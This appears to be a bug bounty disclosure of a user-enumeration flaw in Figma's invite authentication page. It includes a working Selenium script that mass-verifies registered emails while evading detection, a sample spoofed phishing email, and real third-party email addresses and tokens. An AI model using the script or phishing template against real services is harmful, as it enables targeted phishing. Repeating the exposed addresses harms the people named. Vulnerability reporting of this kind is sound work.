🐙User Enumeration via Authentication Flow - Email Exposure

Summary:

During my investigation, a vulnerability was identified in Figma's authentication flow, allowing user enumeration based on UI differences. This issue exposes corporate and institutional emails, including those from major organizations like Dell, the University of Massachusetts, and various big tech companies. Attackers can exploit this to validate employee emails and launch targeted phishing campaigns.Additionally, a script was developed by me to automate email verification on Figma, enabling mass validation of corporate emails and filtering internal users for further exploitation.

What is this URL and its purpose?

The URL https://www.figma.com/invites/auth is used by Figma to manage invitations and authentication for files, teams, and projects shared within the platform. In this flow, when entering an email in the following URL:

https://www.figma.com/invites/auth?email={email}&is_not_gen_0=true&resource_type=file

and clicking "Continue with email", the following behavior is observed:If the email exists: A button with the text "Log in" is displayed.If the email does NOT exist: A button with the text "Create account" is displayed.This behavior allows an attacker to mass-validate which emails are registered on Figma without authentication, facilitating OSINT and spear phishing attacks.To confirm this behavior, a test was conducted using a personal email registered on Figma (juanfelipeoz.rar@gmail.com). The interface displayed the "Log in" button, confirming the existence of the user on the platform. When testing with non-existent emails, the "Create account" button appeared, validating the vulnerability.

Examples of URLs found in Figma's authentication flow:

1. https://www.figma.com/invites/auth?email=mark.zabala%40dell.com&is_not_gen_0=true&resource_type=file

2. https://www.figma.com/invites/auth?email=lejones%40umass.edu&email_token=stv2-lejones%2540umass.edu-4fcde944d7866e8db62b34ab45f4e82fa8f1be72e1c1da2f3c1148d793b634cc-1682989594&is_not_gen_0=true&resource_type=team

3. https://www.figma.com/invites/auth?resource_type=file&email=brian%40codealgoacademy.com&is_not_gen_0=true&email_token=stv2-brian%2540codealgoacademy.com-7c781a0d5fa089726934aa9e56ea33d1c4199e324f4e15b8bbf5501be34f9e86-1725290165&editor_type=design

PoC & Repository:

To facilitate the reproduction of the finding, a private GitHub repository was created with the proof-of-concept code:

• Private repository: https://github.com/JFOZ1010/Poc-Figma-Hackerone.git

• This script automates mass email verification in Figma, enabling an attacker to efficiently filter internal Figma users and extract corporate emails for further exploitation.

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time

# Configurar Selenium con ChromeDriver
options = webdriver.ChromeOptions()
options.add_argument("--headless")  # Ejecutar en modo headless para mayor velocidad
options.add_argument("--disable-gpu")
options.add_argument("--no-sandbox")

driver = webdriver.Chrome(options=options)

# Archivo con los emails a verificar
input_file = "emails.txt"
output_file = "emails_verified.txt"

# XPath de los elementos
continue_xpath = "/html/body/div[1]/div/div/div/div/form/button[2]"
button_xpath = "/html/body/div[1]/div/div/div/div/form/button[2]"

# Función para verificar si un email está registrado en Figma
def check_email(email):
    url = f"https://www.figma.com/invites/auth?email={email}&is_not_gen_0=true&resource_type=file"
    driver.get(url)

    try:
        # Esperar hasta que el botón "Continue with email" esté visible
        WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH, continue_xpath))).click()
        time.sleep(2)  # Pequeña espera para que la página cargue bien

        # Obtener el texto del botón final
        button_text = driver.find_element(By.XPATH, button_xpath).text

        if "Log in" in button_text:
            return "✅ Registrado"
        elif "Create account" in button_text:
            return "❌ No registrado"
        else:
            return "⚠️ No se pudo determinar"

    except Exception as e:
        return f"❌ Error: {e}"

# Leer los emails desde el archivo y verificar cada uno
with open(input_file, "r", encoding="utf-8") as file:
    emails = [line.strip() for line in file]

results = {}
for email in emails:
    status = check_email(email)
    results[email] = status
    print(f"{email} -> {status}")

    # Evitar detección por automatización con pausas
    time.sleep(3)

# Guardar los resultados en un archivo
with open(output_file, "w", encoding="utf-8") as file:
    for email, status in results.items():
        file.write(f"{email} -> {status}\n")

print(f"\n[✅] Verificación completada. Resultados guardados en {output_file}")

# Cerrar el navegador de Selenium
driver.quit()

my script runnning

Additionally, the following files have been uploaded to the report:

• emails.txt → Contains all extracted emails, both valid and invalid test cases.

• emails_leaked-figma.txt → Lists all discovered Figma authentication URLs.

• emails_verified.txt → Output file showing which emails are registered or not.

• script_emails.py → The Python script used for scraping and verification.

• requirements.txt → Dependencies needed to run the script.

Steps To Reproduce:

1. Go to the following URL in your browser:

https://www.figma.com/invites/auth?email={email}&is_not_gen_0=true&resource_type=file

1. Replace {email} with any target email address.

2. Click "Continue with email" and observe the response:

   • If the email exists: A "Log in" button appears.

   • If the email does NOT exist: A "Create account" button appears.

Automate this process using the provided script_emails.py to verify multiple emails at scale.

Impact

Exposure of Corporate & Institutional Emails

• Emails from major organizations like Dell mark.zabala@dell.com, the University of Massachusetts lejones@umass.edu, and other big tech companies are exposed.

• Attackers can build verified email lists for further exploitation.

Reputation & Trust Risks, Cross-Referencing Breaches

• Figma’s security reputation is at stake. Users may perceive the platform as insecure, leading to significant trust erosion.

• Loss of customer confidence. Organizations using Figma for design collaboration might reconsider their trust in the platform, fearing exposure of their employees’ emails.

• Exposed emails can be checked in https://haveibeenpwned.com/ for previous leaks.

Facilitation of Targeted Phishing Attacks

• An attacker can confirm employees using Figma and send phishing emails.

Example phishing email:

From: security@figma.com
To: lejones@umass.edu
Subject: [ALERT] Suspicious activity detected in your Figma account

Dear User,

We detected an unauthorized login attempt to your Figma account. Please verify your identity:
[Malicious link disguised as Figma]

Regards,
Figma Security Team.

Recommended Mitigation

• Return a generic message instead of differentiating "Log in" vs. "Create account".

• Implement rate limiting to prevent automation.

• Encrypt/hash the email in the URL.

• Add CAPTCHA after multiple failed attempts.

Conclusion

• This vulnerability enables unauthorized user enumeration, exposing corporate emails and enabling phishing attacks. Immediate remediation is recommended to prevent exploitation and protect user privacy.